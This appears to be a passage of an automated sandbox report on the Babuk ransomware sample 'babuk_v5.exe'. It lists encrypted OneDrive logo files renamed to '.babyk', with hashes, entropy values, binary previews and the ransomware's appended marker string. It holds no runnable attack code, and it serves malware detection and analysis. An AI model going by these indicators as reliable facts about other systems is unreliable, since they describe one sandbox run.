                                                                            Preview: .w.`.u.....S).....v.u!.....B..s.cX..^..CX~..M ..d...[..o;.e.".K.<4-6.....G..i...H..i.M,.sF...`.K0...r5..b..K...3.(.e...%......,...k....>........ZQ..\z....g.7....... .wL{z....p.J..%...[....a82.&.....-....../H........(D.`..e.XF.....P..\<.c.....5.n~.?..+.8q.._......dV...t'...!\.....|..F^%.....(D.K%...[.s^.S......,.....W.O.q...../.D.P...S..`._#..%.$.......e.H..X,G...l`}.dx..P:2.f*...P8%<..#)..g..`&.5.,8.d.r. ...&%W4H.[.(...t/;[.du....kJ0{.R.....\....(..ib.oD.+..r....\0.P*6....U.:..&......n."Y...!.Q.....B......G....y..+...1...{..pG9...i..ivxjcV.aj..Wk`...CKV....*......QZ.`l.....`..%.wx.U.XA...J!'...GB..'...r%M@...V.p...UD.E...{|.....A#..jM..+.0$ZwDS.{....H[.R.H...t..5.<I.'4.IE.<..N,. ...Q.Kx...]T4.S.Q..2ZU.).....L.0..Bl!..2..N.q~.\.A1....t.....r.GWXudW.a.....Bg|......r.... .8._... ....Nw.ivnm/n..E...a.........>/V-l...=..B.......fq.b.S.91..*4.-'.9?p....ri`.gP..h1..tN.:'E....i...k..!..T..b...K..SA{`+.Q......'...............1..w.......{I.x...Q.X.$."V
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):820
                                                                            Entropy (8bit):7.730165490762418
                                                                            Encrypted:false
                                                                            SSDEEP:24:XDIMUReWEKxSEStZYSAx+xh8qOSgxXI8kBcRJZ+:XcnRSVjYSAxvShxc74
                                                                            MD5:AE54675998FCD1108E3D688EB5C37CF3
                                                                            SHA1:7876AFB5CCF6B1CB99DDD0A3C23FE2375FDE8747
                                                                            SHA-256:9926A0C1C4036BCB3B3C6FE9F2E67589AFC4670CEC35C0411A8313894C0C68B4
                                                                            SHA-512:7F0EE2E7BF239D51389CA9B61EA99AE49E9F05CE43A17C36E29810ED700B8A751DE950AF85B43CFE95C305319B01DF5259AB3D063DC7C800C1CF33FD78282725
                                                                            Malicious:false
                                                                            Preview: .1....c).S[.(N.0..*.v.$Z..B.......)F...W....7.w..g#}..s>=9 .7.m..'h4.....j.Cp.$..h.U.......#H..9...&......HW9..$;.%V.4......,....]SY0..j{..0.c..}.u....!..?.b&.#.../...c.D(.v.o,.....Ur.Nm.......Xb....3........>0c.g.\...;;/.. .D...........w.[#P]...1.....F?.8.....,CI_s....d.....5E.[...l...4:l.z......O.....f.A,1....D.$.[(2.*U...@i.`^....!.$\.@.*.HL.FN...9....2.,\q.....k.cv.......k.Z.9..Ni.Y..\_...n\e...7g.%..:Y?.8A.|Mm....S".....J.Y....s:j....0=Lw%k......P...0.F(#.]fh....K.Y.j-........Yt.....bOH.N6Z8.B..j.l...:.ijD.!x.........3...T.>.....x.B........$.s...{....Ls7.i..}pxt.......4.s.....k~.@\..........L....F.......3.H....(..*.....P.)....v.,y.m.....#>...g.W.C...q.._.....g.!.M.z.[.{8X.l 9Z.m'...&A..#.t...{8...N%D.#B.D..9.......KH.I.kU....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1016
                                                                            Entropy (8bit):7.754529935637241
                                                                            Encrypted:false
                                                                            SSDEEP:24:cDTsSWHozMSOCPB+swbqpT9M1zB6covHirgums2BGSME:UJWHozTpPB+swbMMRBjovCrgums23
                                                                            MD5:D06CAE69DF4EBABF4DB8AF503E94145D
                                                                            SHA1:AB8333F6F8503CF2640B3B9094576514DAD9AE87
                                                                            SHA-256:FFD21970B007175E1DD0E934B66525805CBF981838567A49D2CC87F34F8C5225
                                                                            SHA-512:4E22DCB639A346F41BAFF8FB60A7C7F1D2CE14652EE0AC61DE2B99586E62C134785DB0A4FC1A78D6847A151320CB5CA857E56D12343D6CD0F60A87BC7ABF137B
                                                                            Malicious:false
                                                                            Preview: $bz.[....S0$P.bp..A....A.gJ...GG.".:.&.V?..OWu....G%.wN..8n..4.P....._}...rF.Nww#'....p .~.....#...a.W]..E>...%.[...:.C...4.+....X.....ys......K.....p.....F.6.Y.XB`... ...z.Q.....:."{..@..H.g4.`.L.... ../d|..W...zY......V...IH..`.e..$..h[.....7.......?...f|..#t..@z...pD..h..IW..g.p?c.M....8T.c..#...r.V......je$f.dvR.y.....,....L.........."q.4.N)....n.\Y.]..@R.26.Pp....6.0.q..q..7...Y..'}I.1m...... TCW.kpbC...Q.....|x...5.0.4..@7.b?..$..wL.>.K.(Q...L^....s.|.^..$z.n.3...d6\o..q.d.r.k.N.i.B.6.n&}.6.z.i....^..3...Z...,zHU..^.!..._)w.[.0..&....0<.._.m.7..O..W..o.......L.O...F.#..../..bT.#q:v...>n...@AE.."B.M...S../.n.aD[...?.lX.9J....V..p....J...5.#.E......J...@..c.....".$...W.#.L4sb.x.r*....v....].H.g.h...#m..A..L...+..?..8...eO(.jo...#.1j.....r..b..so....+.V.v .H........;...4..%H..s@..R:....c..........x..#@............9gR$.?OGg.n.>[._......j...gY=....L.Z..D......q..,.!z.f;5......n...P>...b.3..z@E....D.N......^.V..zN+....choung dong look
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1158
                                                                            Entropy (8bit):7.8327192864094775
                                                                            Encrypted:false
                                                                            SSDEEP:12:66IncWbgcGvxKNiy0rgYqd5s9wkk1PWOfn7TmPm+Pw9NrWMr4KPA6l6BdkTS1axw:scL5KNiy08RoZk1xn77GWB6rkm1qC
                                                                            MD5:D6C6DC72370F28CDCCB475694B9F0D99
                                                                            SHA1:6AB4A723CC4FB61714214754815F0C9920E5263A
                                                                            SHA-256:3173F3BD1CFBEF8C385BEA0AFB044D5903231E3AA425D2FA20FD3487B20396C7
                                                                            SHA-512:0CAA694C7885441ACB25D7097420A51DA5C15AC17E05C2825F8B1264809733A7C21A6541E14E1F121E35DB4BCE1055256B99C22B0C89E4135CCF2FFA998BF032
                                                                            Malicious:false
                                                                            Preview: a..5.J..&.Z.........)$.................J[zL......nc...4,...P.`..L.*.CA.j..9..!..,w...-..@..a|..t.M..X;yM..........)q.E.g0..\..5].>..)x...u...E...M..fT.. .W..yj.jyW.M..g......@..s.6uQ..T.(az.`..%m....9.....@V...V..eT..............-M..ANW.9.....:NL....-+.....Z.......A.>G;..;...7w.............%....8..q......4.~....?..\..$X`@..RLj..d..N$&.w.8.n..a.~.......e..{.B......1....:...3.+....i.H....r.y.....%.Kx~..0..N-.y....'.x..[$>..aS.8.<..a.AZ.l..t.-o.5&..2.o.6i..cK..Q.[...a.xO.H....^.....G......`9.G....F........N.LkMg..{..!.U...Z..}#...:......I.,(.`7....R...6D......;...E.....CV...x..sVA..J...6.G.;......l...Y.J.S.!T.h....P.^.x7c.$..)".........Cs...8..H.uuh.UX.i._.s.g@....J..@4a+..........v...^....8V..+....K.X...L..[{x.[.QB.X....."..^J.5H..3.%..%]....!..(...K....[*.|...m.*.........~A.s.../%L.".i..h..Q.s.m.."H.N4...'.....b[.. .[...Q...5.d.#......B...O*.S'E...~.....:F*..Q.....6..d(.u...S..?.X.....$.,.a..;.......~.R....g.rB-.jq.m.......l#...
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1560
                                                                            Entropy (8bit):7.871012342689059
                                                                            Encrypted:false
                                                                            SSDEEP:24:s222AE0mM3uLo6cReNt6tppLr1s6uE8EgG+zygXjeDfmKGSH9vncywXPD:gmo3AopFmc8G+zygz0fmxywfD
                                                                            MD5:6E06D0432E485CED23F6328D77A4953B
                                                                            SHA1:48300787C831503F2458EC842C85497E4F3ABA05
                                                                            SHA-256:45C642F132399D328349BF5A4B0B6F32B4E29105246AB778B8A29236B7C780BA
                                                                            SHA-512:C4A30A2D040DA2C49C8707C4FCE3B61357466094A43BD3834C3268F998773DE22DF435729C46F5AE6D8F13B248C06F0455FE6E9EC6BDDC3446AB2850CE4B6C5D
                                                                            Malicious:false
                                                                            Preview: ...uD2..'.3......SB=...mF.^,...R.c..AC.......}..v.|@......^&...4P..i.i"...}$V..g.g..{....[3`bl....n9A...m.yk...[.,r`..=.n.0....K....3..e..TF9.F......q.*.m2V......%...}>.;../...h$.Z&Q3.y...@%....%.U...&.....oi....A..cuiCW..d.G.../6Z%.i../`.._N|...q>M.*,DC. 1M.....)......6W..'..+..k......s...z...[m....#/6.>.M..F.C}...F.....V$.".z.:..4../.........<'....2j.6.WZxs........R.n+...7...B.)l..Wd....&2f..a5..N.8..{.5p0."/..,..Z7..@.&.......s.B.a]..sO.C.1.......@....AZ.*.lME....S......'N1..E6..x..bV....F'..v......X..OK..~..2a.[.{.s&....*)...T%..._<.0K).6...........x.Y..p2..h...Y_Ki...WPc............*j3...,Y....O./5.z.X..Q#....~....|.{=}..WmcI7h.la...7..6.hER...s.W......kt..Ly....78.TO..L2.....~..l1.Tg...VD.9.....$......:n.*N...q. .e[.$.........e~.t.....a..\.u.17.{e.bjl...5DU..U@..[O......Z...".....MF7..$.C......C.(..|...C._.~l..#[CNB...._......[.2.q.n[......1#}.4..V...W+A..LS.kCA..."(.d...J;..V.+....._.g.X.k..N..l..v.......!k!.hVI.c.3....C..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3394
                                                                            Entropy (8bit):7.944732837023405
                                                                            Encrypted:false
                                                                            SSDEEP:96:C10VHPKxMf7EIL0O1ZY7QGFAZ96+I1ddTAiDNh9x3eMb5:NSx6EkZYUKr+6ZDN53nV
                                                                            MD5:2F38D228A14E9154932ACB5B4AF1B9D7
                                                                            SHA1:ED6D59A54DA6358716D8DF3D95BC80C3A9674952
                                                                            SHA-256:C68040759174308737A6254AFA54C89A37B60ECB60BB2402C48E2D00EFBA0B42
                                                                            SHA-512:619E1DC04011BB132FF2F2D5780A045351CECA218050C912A5D7D2B81C76E3BD7E2C140CE596ABBDFED8E927748F66423450BD1A89B3EE66823AFEB73AB42FCD
                                                                            Malicious:false
                                                                            Preview: "....v!.drS.[..'ic..LVvA.?.+.=..n...6..../.,..p...].6...(.g"'_..4(.Y.{.\...r........r\...?...s.==\.3.{...R7J6a.-...U...L.[..............44E...../FT.k..h?..R.._o.....@..4l....V..B<@.h.%'..)r.....F...2...o.k.2b.....b.-Y...Xo....\.43...B.f..M.rk........ .G?D....e.N.....;..*.n.b*..~..........X.d..Q.........[.ND..5".....e.i.].)...Q..;M....E..t...z.....8F...H.=Vu..@..t4....l'p..t.~.yB.a.M*..........D.u~...z~..)..~JH./.P...c.~.Kk...A..0...)..O..L,...}.6d...(9.S%.....g..:.....M....U].t..:..i]{.....}.m......)..).t.[.w../..K.:.=7I}g...u....r.E^`u.....:.Ip$A8.g........V&\1c..&..S...#...r...}....v.&....Fu.....j..u.CIye.....{.F#.Rcg.q.7.l..c.y.?6.f.n.).B/M.X.)....$...|Y.t.P.,Q.F.......v..Ys......o.jN..IQ.p+...1".nc.W.."...\m....M.2....)h.'..u#.....#9n.s`.-4..W/>k..0)......R.s..oV.}..#(..ea......P..~..Z.........K...V9 H..N...p.....P..s..8....@u+.....B.......1.$C.....O..5".L..z.25..._.J#b..X[oJI..(..cM..Q..p....KQO.....~.......e..X2vz.;P7....C...6...z_F.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):581
                                                                            Entropy (8bit):7.613726800586591
                                                                            Encrypted:false
                                                                            SSDEEP:12:Mq7xW7HWnMwSWLMZMXnM/dB0jwNcFlzrchhu8e0oNvQDb+zs:Mwx+2ncZp/dTNcLz4hhFG4Dazs
                                                                            MD5:27A435B2361A2F11ACE9AAF29EE6DC00
                                                                            SHA1:4514350BDD051247C9C791328F3DB5C428A7F86C
                                                                            SHA-256:312D6A585D77E4EAF618BD1390EB9B9B6742E55EB83154D6D4B242BD521F09F5
                                                                            SHA-512:8D5200048191574F5CDD647EEE717F31E32DC88C5E2F6B9B680A1D0F1A1D24FC0B7314A0768AF00A48533780B92496F31BB492E6640D9225CDCEACF58432B4B4
                                                                            Malicious:false
                                                                            Preview: d...,.$....<...A?&.mr.".W..T ..S....Fx.g.?n...i.&...j"D..}.R..w.....F..1.w.e%.b]."\Z......W.....j;...P."L..XGW4gS>...7..8.76..bD..q.l7..M/."../..1.........@3.....0~...p..#........Y.......}.U......\.K#y......?.....^/..b...w.....V..G..../%.V.h.}.........]6..Q....".....+..mv..K......5:L........i.s;a.... .$..}9... ....v.N.[.6..#=.B....>J..0..u..0..}.y....j.6h..{..AiG.P.2..J...e.#..&L\O......@.....j.)de.q.......Q.z...+.3v.......({.hP...*.O.......PvC..':.B....P...Z.!.x.d+.k.S#..p....c.}-.G.D.%..B....rq..y..UI... ..Y..q....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):693
                                                                            Entropy (8bit):7.691832770494788
                                                                            Encrypted:false
                                                                            SSDEEP:12:1w5TZCsfuAy2hwAra69J46tVe3nntE5icymgJSh28xdYf2z5eZaeNdp:q51nk2XpPusth2ZfQogeND
                                                                            MD5:410C6EBB8C2441E4D316E6B7125ED583
                                                                            SHA1:72C92F94EDC2C94A7E09392EC2C39E8694774353
                                                                            SHA-256:13035493DF42E1449824E15A54118F2905436BFB069DC8846342FC7DF36CD53A
                                                                            SHA-512:C390700244EB6077B0927CE1A9145B56317360D2AE5018A6E893FE86751B5B9DDEC1E49DF60B95E1193246A529AA3344ED9C9208EC746B7B657D19CA33A54888
                                                                            Malicious:false
                                                                            Preview: ....@n....[m.a...:.@....II....p...X..I..>.H.i4.sSQn.....T...S!.5Dm{2@.}.b...=.:g.....[.....M.R.........A.7.....<d.%.g*.:Tk@.....IQ1..1.sF...e...X~c.Ip...0...D..'.R.Zr_'.G7...F..?....E7..q.7.~4...H*..|.`..].I..D.2f......4...W.g...E#....7.....|.O.@>.D..y.......6..".m.\.).8..Q..B..77.g..S..u...r9H<8.).8.W.8....v.L...A<..\.*..!`.i.. ...J.J_..1...!...z|.H.<.wb...Y,......".I..(..'..........k...jt.=..2W.F4.R...G..A......k.~!.I&.g..7%....^..#jSU..m.. .|.~|. ...8..@q...E.R........w...-sc...8...K.l_.aM........!gBW*s.4....?..H.3...6..$..6.l....G....*X%T.u{......=o..... ......f.$.td...i&..f.V.Z.,..4.x.....?....]...%&.G....Lh`(...^.uz....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):759
                                                                            Entropy (8bit):7.693592618321914
                                                                            Encrypted:false
                                                                            SSDEEP:12:E2bfkGn1jE0HYo58F2uJVltnySnNBYpEZtyYTI4Ve7GcrZB+oYk5ogkx1o0qu:lbkY1QAYKVAVnTNsETdej6oT5oUw
                                                                            MD5:2CA1CB0E978A666820961D0FD54919E0
                                                                            SHA1:D8F1B82908F97782D17F8F9BDA60D9855963F973
                                                                            SHA-256:191B007DA39F0E050322F827032B6DDB5FE92EBF8E14A1BEC0819B977179E0C1
                                                                            SHA-512:FCC9F813CA9381A6CD86E406A725D8E0386B3A662D5523A8E50CEB8040A31736CE45F5522378B621E5DAE358B91A4E34C2E8EC0A65534066BF97E7BC6423D113
                                                                            Malicious:false
                                                                            Preview: .......2O..L......F..n!T.E#.'."9k..[{...Q...1,...}..Ad.4~T._....baR.`...T.......%.(..c3._.....k..........0...o.j ....`..{...xS.&.zj.L..gK..X1.Q.f..V...r...t..&..]C........._..MI. Un-..y.....y)..H...D.HB.Q|..Kl...P..... @.._X.H].....EW.._......t....?..I.c.. .=.-.'K+........~'....0...&M.........d.rmQ?tk.O.m5$./..Z.IVo(.....K.b".w....*.6<;]...f^...PF4.0.n{c..../(.+.C...(w.wc.......D3.$38.k9..~.......$Y*R..pN3=%...!..'.@.j....u7..`..\!....`...b..2q$.u.U>~...P.....l[].l....#.....ZS../F.f.)>.(%0?....P.......x_%.F...(-0.C....wD...1.o.<..!..a..Wy.!E..~I5,.......(+V..x.f"Ky...Y..B...J...i.Y..4Q.K..'......,..b.7b...u.C./...........t.mt..g.n.._#..e...j..qr..;J..Mbq.'...@...}Y...y..#....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):971
                                                                            Entropy (8bit):7.771514047258955
                                                                            Encrypted:false
                                                                            SSDEEP:24:Y6EUFN5IWgr77YUbb6RG2TnX+2tb1qj+1Qyi0P46m10navq:TEUfalr6zfbY+K0a2avq
                                                                            MD5:EFB32689F5BA984039018043B90FD8D4
                                                                            SHA1:7ABD92200EFF0E9A5C84381BCF0B7E80E2117E4C
                                                                            SHA-256:ACAD3183CAAB025ED450BD0218B047D0BAF29C0BCDD2869235A8B9EB2565AF0D
                                                                            SHA-512:34BDA95357B55D4041C132B05A7D41195426F9172ECEAB9980EBA3B3121EF02F7203F343731B7076FC3BE99DEAD81FC52C57AE86820C57F3B0049B32671CF085
                                                                            Malicious:false
                                                                            Preview: ..g2.!J.l...u.z<.v.*.=3.L.Xj..>.[*.P.A..[...\4...Y./....1..2[...H]...+.,8{...`/...3.i.........7.I..d....ndB.&(p..^^...W-G..r.)..0J...C...L.~Y...i...7'.V.....g....\...".M..].....B..0.F.t^..#......z#.i....P..&"-N.x..Nf.}....L...........w.b......-...q.vHG.b.5..m.4....6...X.+?....t..{..GTZ......|W.R."q ..L...J....y.u..cx.<h..<2....3..m.cf...p.kt...YZEn.......2.?...2j...P....'(.1..P.z....t.....8...@W.0.arI&]x.d.u..I...c..*.'.=j!.........^....a.....I...g...ft.#G$.em...$.JYG.G..C...^4...0..<..D....AL....{U....1.1...3..+..a"......m..I....T.......E.V.2%._n..........c.0....e...*..Z............y:*].~.."bn.9.@..Q....p..}.QJ.....+]....O.r .+..V..mKb.^.....3..W..K.L....8.+.oxsTO..`<.r....e......F.B.I....\.!A9/.q...4*.s.0|e6.....I}vz...#..mEx=L....m~..}..*..*N..H.....Z.H$.Sq....3.0... ....o.\Z..5&...c|."JPp...xT...T1U.>~...2.UZ.zX.....k.u.>'B.h=G.2"3..k?I.O.jJ.y>...."...m..s...;OV..r.|..4....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1888
                                                                            Entropy (8bit):7.8940862497227755
                                                                            Encrypted:false
                                                                            SSDEEP:24:ceUtXgSeo3vn5uy8ovb9H0R+6wkD7i1lYHu/TJZ3GO4dXF794xUpO8vXl+oK:/qXgSeo3h5decCHur14dV/VN+Z
                                                                            MD5:9AE8D3AE10196DB40E33D1377390AD3F
                                                                            SHA1:706877F5A49B868AD887E1DCD48A06EDF8918BD5
                                                                            SHA-256:A5D6CFA10B164F916BDA503BA2B487601E916D3C34009CBF27869053EF5543C1
                                                                            SHA-512:465C805E9B6430FAF16595BB03F1FA2F65188BD64975263AFB2DB3AC0AAB7C2620617B7492F2F9AE23DFB875842C15742094A2A46839A8172D38E36B5BE1CBCB
                                                                            Malicious:false
                                                                            Preview: t.z...h.Kh....$.H..{..a.1.Z..K>..X.=..CuJ1.'. n.,*.q,q?...?.R.^5...%..t..d ./n0....8.k.D......f.u..;.O..C............d..}.(...N..D:...)........3.....P1f._.......zX...7....T.....@G...E..a...y....}l}...mZli.prk...~l1........;.`0....m.J.d...5|8.....bB.sI..}k#....=..#....]..'.oCN.T..i+..-..."....F#.j4.v.C.m...O.&..- .I...r?.H.....qhi..].....Fy{.y#.....X.......O.8pyW]...t..!1F^T4s...i....=..'...lj)sF......M...N".Qn.B.7#....7...]P@rJ.xX..a0..E....!1uJl...D ............3..sI.,.1.A...1&.9a).{....u..A..:.7).eJ&.O..+.../..7..p+.w.....!@......0]nY...9.....<.G.=..).....t.6....z.......Hp.&lw........U....;........f....E..|W...^%d....!......3.nI...j....Pc9C.Zk.'...GQ}.......1i.O}a..7M&.2.d-.@...Q..}2m......8.....@...H+k...aWc...$.&.........S.9T...k.....C.....@...ab%.n.....fQ.aj.....p.:h.4!.N../Z.....1.T.v..ce.V7D3...H(`.....6.......&}.[.o.KX.Q.G.'.L@..3.&..dO....%.......c..{.y...E.#=..)....m^.;.....x..Y/....W{..Y..".4.C.E...`...}..4.&..'.mHQ.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):584
                                                                            Entropy (8bit):7.609817543535703
                                                                            Encrypted:false
                                                                            SSDEEP:12:Hyi/cn6oX0bKKkFAwiosyax+gB8dK76IhXs:Hv/cnbXLKcgvB8g76Ih8
                                                                            MD5:4A77D0933B521C0503D5783D3DB142B3
                                                                            SHA1:64F1D6DAB0626256E6EA5E6C4BC8642329767877
                                                                            SHA-256:92C3936E7CFAEEAF26073CD77FE3B3E072F976E8F74395A1943BD17DEF75A997
                                                                            SHA-512:BB104E7D21DE435A1FABC91DD2775394DC608F935CF439DB406BFBD2D4137356E138F6B400FD1DB2661148A11EB6758E91D0F9789D8354F3920038D1B48E8703
                                                                            Malicious:false
                                                                            Preview: r:.#...`....G.......(:.\.......L..i.s.....=05VL[7#.%n...ir......CG.0...=.~......H[ZG&.......Y.,.q..30[.:1.(.E.....<a.....#...&yj........g....bB.....}(~..e...Lz.............&..[yqjZ7....r.......A.S0R....M.D,..5.H..PW...L.|.K.}j.A...V.*...[E..Nh/.X..'...'....A.mF..F.).2.Q3.........*"'....$V..7Q....f..+...<..w.%#n.. ..`v\..L..)5v...$..yN.Ma3Ew<M9..}n0...b.#....J.H'I.B.ZJ..~%..xkx0...|.p8-.*..."|.TJ>k.~.....E}.b.}X....2t..eW$P.Q....N...I+...Wh.3pq.`. ..~Hd.x....e....W..QQ:<....W.....+W.J.....'...........m...%......y...y.......7....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):700
                                                                            Entropy (8bit):7.6688901190500305
                                                                            Encrypted:false
                                                                            SSDEEP:12:awNuML3z4JpX7D5BHGac8IjfCEWYofQEs9R+LIJ6Q:dNuMXoXpONjfoYCQRJ5
                                                                            MD5:5A97E64B2F8171690CA6D3C80D40F529
                                                                            SHA1:30A7C9CE7F6E95EAB31225A151E8154EBBF0D4DD
                                                                            SHA-256:52772FF1DBB4DADBA6304848E8721EDE2A1982AB2B6AE959072DFF02921AD30C
                                                                            SHA-512:20B52D72A8DDBBCE2BC2BF330C781D5BB5274391329077B5D414D96837B8B20174147C56A45D8A6FD0450919CDEB0E0418DAE264E2FDBE8834FC361A57AE8EC6
                                                                            Malicious:false
                                                                            Preview: W.,2.2-.S&.$.?..1.....E.iG.A..l..Z.].>h.....U'*.....pt{.:......5/.....p.+..t...Q.K....~z..)k.7\...K.....s.....4.,~N....^.".LFL...Kv...M.cF.K}...*...d...K..T0h......i...j.^PE..D".ia}.."|...G!F..S..G..!...HIN..Qb....%3..0.Q.M...o_.....0vt9.wx`..^9...7.).../.%..c....A\.KG...!.e)...7m....O". .J...vg......9E.*}..9@Ux%~;.AH........|.t.L%.u..?..Z.....ZR.[+=W._.D....O5.cz.<.|u.i!....c....;.E...._S?.0..L....n..a.uW.!Tch2.s..o.....R.^{|c..e.1z..M$4,..h...d..`JZ.a..z......-.M...t4..L..&<c......a....Nu..5......x._A.`^.g.........OLE....i.i..._J../@x(.f......~!J..&R.%..V....i3,.K... ..v.O.....R.Myc..}..U.}0..L...+....B&.PS%U+..?.Z....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):765
                                                                            Entropy (8bit):7.748163763964508
                                                                            Encrypted:false
                                                                            SSDEEP:12:q/WlzZMbUtHkBmIBhqUselGYQo5BVdUC4Nf/erx43SKklMv+5CL+:zlzZdtHkBm0o0/QUBVdU5/g4CKT+5CC
                                                                            MD5:0CE76AA42ABA7A3AACC007BC5678B9AD
                                                                            SHA1:78A76C9CAAE32A8B5E76632CD99FA4BB9F2C27FA
                                                                            SHA-256:A33AE34B035122526731B12050BDD759E636BA10D5CD77FBFE1FE6562A3A6379
                                                                            SHA-512:5F520B8CC19CE08DCF5CBA76026BF3392D177C89C993145CA28F31EF2817261ED0FBEC05799EF0018085525D338ACDB4FABDFD0D5D1702A5B7F5D7BE3CE399BD
                                                                            Malicious:false
                                                                            Preview: .=..0.f...M1.].q.p....r.O_....|..H.5.....n...r..8......M6.Y....nX{.U.o<.&....G..._.%..,!..1%....S..,.........E.o.0g........V..Zw.0v3}.....*.3).2...&0.,.?.v... <.'...8y'.4@:.a.(...........d.........g.n~C..h4^d (..dN....1:........'.HdQ..N.....Y.I@lM..zp."m.#...x......I..m.._......U.y...2......F.s.#.an.bu<J.....K..%c@...$.<].P`..f.._.3ur."J."....4....1\.X$ B...WJ..2:.;..a..@..h/.....u^.>....b^..?.^\.b8..%..X.&...a}.z..........I..Q..P.....+.....p..[2`.....e....%C(.^.J8B.|..|..M.I.[.;.6OI...\.e..R.....s9........V=...... .t../.^][@..p.d.1...(.....+yO"m...3Ki..}.}.....{.?..E......?lI.Mr...:..R.......-...1...Ch..G......F.G..~..|\l..l._..T!...;:...j.HW...g.1)..h!..OcF...u.\=.....a.../"m.m....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):982
                                                                            Entropy (8bit):7.779882551757573
                                                                            Encrypted:false
                                                                            SSDEEP:24:meCzr/7on4cXHv+g8ym8QarQ9jJr5kf1ECe:DCf/7EWLvXar4lr5kf1ECe
                                                                            MD5:9D0528F8023278E83429DD841C142305
                                                                            SHA1:BF3A9584B3445AF38F99F104F2205C58F77B40B0
                                                                            SHA-256:635111E874B75CA1CA10A80588E3A938D618843497B4631F9A08BC9C44C2CE75
                                                                            SHA-512:F246205A695F5400B1A4B1EA4A91A7EE03EB83FF746E1C0FF8F3A54ED113F46BB8759E85E3172F6003E62789DAC48C0DE4903C42172865B2215E6B3D5EEEFC81
                                                                            Malicious:false
                                                                            Preview: ....G.G..'...-s.<1U.A.... '...ZCY.....6....j.).}.D.......?.h;$5Sd.f.{.>.8a_......@.K.(.b0OR*vI.!"!.......b..y..R5....0.1..}.~g..uf\t.....f.. $/G...M.R....n.p...Q<.2.g.....c.F.../.q.3.^x/.h..U.dXl.X$..T..Uh....:..:...s.....P...._o.xe.K..K.GP:o.&8..~}."wd+.E...N..).d.s;W........c.uc.U...G.@Q!.5....>#.g5i...g.QKM.1.J.v...c.m./L.H.....a.........%.\f..LL......hl....V[.2..w.R5[C.h......!.`.1.y,:.6....]..`._.e..i0v../....h.........-s.x.g...a......*..\..Ds.q...W.._.nT+X.=.u..Z.,..D!...S.L.jj..q...qq.*..8.............z.,,.B.....hK..v@..C?.^p.SEh..\.. ...kA.u.35.M..<..to.u...r D.^..QSa..q%..~.....*.n.....%.rWDG.6..RL.!G..Q......\3.....'H.5......5?....r8.^1.....d..L...P3...3..Ro..J..R.2.~"M..18......G}.J..Cb...7.n.w..........".....@i.@]....\..}.O........|...NA.......B}w.G.Xrd..x.i...........D.....D..1".s.2.X.V..Y.._....`U.2./.Y..c...c.6...^0..$V...&..r.\...BzY'..7~.d.....3.....sp.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
